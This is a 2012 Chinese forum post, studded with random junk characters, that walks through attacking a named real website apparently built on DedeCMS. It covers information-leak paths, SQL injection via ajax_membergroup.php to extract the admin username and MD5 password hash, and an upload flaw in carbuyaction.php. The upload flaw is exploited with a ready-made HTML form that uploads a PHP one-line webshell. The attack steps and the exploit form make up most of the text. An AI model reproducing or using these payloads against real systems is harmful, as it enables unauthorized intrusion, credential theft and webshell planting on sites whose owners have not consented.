①注入漏洞。
1 @% |/ l5 l9 D/ G$ y这站 http://www.political-security.com/. L( j+ b/ z' N7 k& ^! K: ~
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
1 o/ _5 u$ Z/ |8 @' y6 t Wwww.political-security.com/data/mysql_error_trace.inc 爆后台1 [4 |1 l. c- ?8 D( _6 ?' ?
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
/ t1 c$ Y% J6 K. c然后写上语句 & N; | N* A0 E2 V% d& t* Y
查看管理员帐号3 {. J- I8 P* S7 U1 J% g8 B$ h
http://www.political-security.co ... &membergroup=@`$ N- Z8 y7 }7 h( O+ [) z
( ~( ~, D( |* `* i1 s* o4 S9 Y( Sadmin . k7 v" h. n1 B; S2 J4 H
2 D% E! c+ c0 O/ }; I查看管理员密码# X1 `2 O% M( G; r2 B
http://www.political-security.co ... &membergroup=@`
2 F# v% F, s* w& A+ y2 a
3 m, [* h" t6 w, P% o8d29b1ef9f8c5a5af4291 \: u' ^# d: ^/ M8 h
4 B& c1 @0 Y0 W' l查看管理员密码
% ?4 I1 i9 Y: C x5 h, x( K) A- D
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
7 Q1 R2 r3 `! t. t
" s% \7 L; e& f; z+ @+ C8d2& A0 g: C) C7 O/ E, ^! {9 j7 v
9b1ef9f8c5a5af42
( D8 i8 ^( ~/ H" J3 l2 p0 S2 i9
: }1 e% \: [2 w& j
; G7 G( p# G- e- Pcmd5没解出来 只好测试第二个方法
8 c u* _* n# U0 ~2 `& ]5 E: M) ?
' I4 I. l" ]3 E# A8 F
②上传漏洞:; b l" |) j# ?3 {. e2 f' j
3 s% X% A8 L/ y- J) {只要登陆会员中心,然后访问页面链接
( X3 J; g0 T' E* s2 N$ ^* { t“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”/ @9 p: e! E2 p) z7 r) K6 I
! N' U, [% T1 @# e; I( }! U如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”) }' q: G( |, a+ w$ X
. S4 `6 u% M# ]
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
$ M: V# J6 A8 ]1 B8 F; l
8 S4 q& I6 T/ Z( A0 G3 s' C& u<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br># L4 ^2 g8 j6 {, q, o0 {2 C/ u6 Q
或者2 M% C5 V1 A. R. j; L- e' I6 p
即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对